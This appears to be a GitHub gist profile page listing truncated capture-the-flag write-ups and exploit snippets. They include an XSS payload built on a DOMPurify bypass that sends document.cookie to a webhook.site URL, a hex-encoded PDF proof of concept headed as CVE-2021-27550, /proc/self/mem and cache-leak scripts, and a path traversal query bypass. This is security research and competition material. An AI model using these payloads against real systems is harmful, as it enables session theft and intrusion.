Skip to content

Instantly share code, notes, and snippets.

View sqrtrev's full-sized avatar
🎯
Focusing

SeungHyun Kim sqrtrev

🎯
Focusing
78 followers · 14 following
View GitHub Profile
@sqrtrev
sqrtrev / reversing.py
Created July 13, 2020 10:37
#Code by sqrtrev@WreckTheLine
import angr
def main():
p = angr.Project("reversing")
simgr = p.factory.simulation_manager(p.factory.full_init_state())
simgr.explore(find=lambda s:b'correct' in s.posix.dumps(1))
return simgr.found[0].posix.dumps(0)
@sqrtrev
sqrtrev / gist:9fdd1df15dfce1e92f60308a3bce7723
Created September 21, 2020 06:22
bfnote Write up using DOMPurify 0-day
Craft url via DOM Clobbering
And xss via DOMPurify 0-day(now patched, https://github.com/cure53/DOMPurify/commit/02724b8eb048dd219d6725b05c3000936f11d62d )
[<a id=a><a id=a name=b href="//webhook.site/f43558da-640a-4ad3-817e-6144d4bc2e7d/" />]
<math><mtext><table><mglyph><style><math><table id="</table>"><img src onerror=location.href=a.b.href+document.cookie">
@sqrtrev
sqrtrev / Balsn2020_L5D.md
Created November 16, 2020 05:30

L5D

by sqrtrev

@sqrtrev
sqrtrev / CVE-2021-27550.py
Last active February 13, 2022 12:32
# python2
# 0-day by Merona-Hunters (SeungHyun Kim, SeungJun Kim, MinKi Jang, DoHyun Lee)
value = "255044462D312E330A352030206F626A0A3C3C202F53202F476F546F202F44205B362030205220202F466974205D203E3E0A656E646F626A0A392030206F626A203C3C0A2F4C656E67746820313731202020202020200A2F46696C746572202F466C6174654465636F64650A3E3E0A73747265616D0A78DA8D4FBB0EC2300CDCF315F7033576EBA4E98E8460AB1811132F09A942EDC2EFE3B4B4042614D9774AEECE8E80ED082A6A9AA99D3A478A1BAC6D32D6BBC39171768C9DD5DDEAE992D547A1A008E229780C175CDDDEB599918DB0A118CA88D3C4D15819B581B3E617676DE12B1397F041D3B0CC312B34A5C977DAE2D6C8B64AA14D4DEC93023D986AE5104649CEEDB55F9CEF8BD5B613AC1FF62DB49F54A132F5483EFEBBD10B287545CD656E6473747265616D0A656E646F626A0A362030206F626A203C3C0A2F54797065202F506167650A2F436F6E74656E74732039203020520A2F5265736F75726365732038203020520A2F4D65646961426F78205B302030203538392E3631303632332E36325D0A2F5472616E73203C3C202F53202F52202F442030203E3E0A2F506172656E74203132203020520A3E3E20656E646F626A0A372030206F626A203C3C0A2F54797065202F584F62
@sqrtrev
sqrtrev / bcactf-stylish
Created June 14, 2021 05:38
POST /submit HTTP/1.1
Host: webp.bcactf.com:49153
Content-Length: 985
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://webp.bcactf.com:49153
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.272 Whale/2.9.118.16 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://webp.bcactf.com:49153/
@sqrtrev
sqrtrev / gnuboard_hayyimctf2022.md
Created February 12, 2022 20:01

Gnuboard (Author: sqrtrev)

https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L65 를 보게되면, HttpClient 클래스를 이용해서 $authUrl에 통신을 시도한다. 여기서 $authUrl$_REQUEST를 통해서 전달되며 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L33) 우리가 컨트롤 가능한 값이다. https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L176를 보면 리퀘스트를 보내고, 실패했을 경우 response body를 $netcancelResultString에 저장한다. 이후, https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L186-L187에서 str_replace를 해주는데 여기서 취약점이 발생하게 된다. PHP의 특성상 $$변수의 형태로 값을 사용할 경우, $변수내용을 참조한 것과 같은 행동을 취하게 된다. 따라서, 첫번째 str_replace에서 $body내용을 참고하게 하고, 두번째 str_replace에서는 우리가 원하는 변수에 접근하게 된다. 여기서, $authToken은 우리가 컨트롤 가능한 값이므로 (https://github.com/gnuboard/gnuboard5/blob/master/shop/kakaopay/pc_pay_result.php#L31), 해당 변수를 이용하기로 했다. authToken=flag로 주고, HttpClient->body에서 authToken을 리턴한다고 가정하자. str_replace 과정에서 $$Http->body == $authToken이 될 것이다. 즉, `$netca

@sqrtrev
sqrtrev / online library.md
Created March 29, 2022 03:08

We can save the payload in the username or somewhere and then execute it with reading /proc/self/mem Run both of the scripts and the same time. One of them inject payloads and the other one search for it. Since we are reading the memory, some links that the script outputs might expire.

#!/usr/bin/env python3
import requests

# target = 'http://localhost:8002'
target = 'http://35.243.100.112'
# target = 'http://localhost:10100'
@sqrtrev
sqrtrev / title todo.md
Created March 29, 2022 03:09

Using STTF and nginx cache header, we can leak the admin's flag.

#!/usr/bin/env python3
import requests
import random
import time

target = 'http://35.187.204.223'
rfile = open('./a','r') #a has nothing interesting
@sqrtrev
sqrtrev / memo drive
Created March 29, 2022 03:12
We can make more query variable using `;`. So, We can bypass the filtering.
(they are using parse_qsl for getting query)
Payload:
/view?{MyClienID}=flag;/%2e%2e/=123
@sqrtrev
sqrtrev / ipc handler.md
Created March 29, 2022 03:16

(Written by okas832 and Reinose. I just uploaded this)

Step 1. Communicate with server

Need to serialize message with protobuf to send data. But protocol.proto file not given. Serialized descriptor_pb2.FileDescriptorProto is at 0x416700:0x4168B0. Recovered protocol.proto with blackbox analysis because couldn't find related documents.

0A 0E 70 72 6F 74 6F 63 6F 6C 2E 70 72 6F 74 6F                                           filename : "protocol.proto"